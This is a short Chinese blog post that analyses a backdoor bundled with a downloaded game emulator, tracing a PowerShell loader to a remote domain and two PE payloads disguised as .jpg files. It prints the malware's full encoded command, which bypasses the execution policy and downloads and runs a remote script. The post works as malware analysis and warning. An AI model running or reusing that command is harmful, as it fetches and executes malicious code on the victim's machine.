前言

昨天下载了一个模拟器,正在打算回味马里奥的时候,火绒突然弹了一个报警,提示有程序想要运行powershell脚本,我一看,好家伙,应该是后门,简单的分析一波。

分析

步骤一

首先把执行的代码复制出来

powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBpAHAALgBpAGMAdQBkAG8AbQBhAGkAbgAuAGkAYwB1ACcAKQApAA==

接着把后面的字符串进行base64解码,先将base64转为hex,再将hex里面无意义的00去除之后转字符串:



这里获取到一个域名:hxxp://ip.icudomain.icu,
先看一下这个域名的解析记录:


解析到的IP为cloudflare CDN的节点,故这里不进行端口扫描等对服务器的测试,继续分析他到底干了啥。
接着我们来看一下这个URL里面是啥

步骤二


对PEBytes进行进一步处理:


去除换行之后的内容:

步骤三

对里面的编码部分进行解码处理


可以发现又下载了两个文件,这个地方要注意一下,如果不使用{可}{学}{上}{网},会被拦截


powershell.jpg部分内容截图


对powershell.jpg进行解码,可以发现是一个pe文件

base64.jpg部分内容截图


对文件内容进行解码,也是一个pe文件


由于本人对PE文件不太熟悉,通过百度得知,Invoke-ReflectivePEInjection是一个可以加载pe文件的工具,github项目如下:https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
另外一个PE文件应该就是后门,分析到此结束。由于本人技术比较菜,感谢大家的阅读。

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖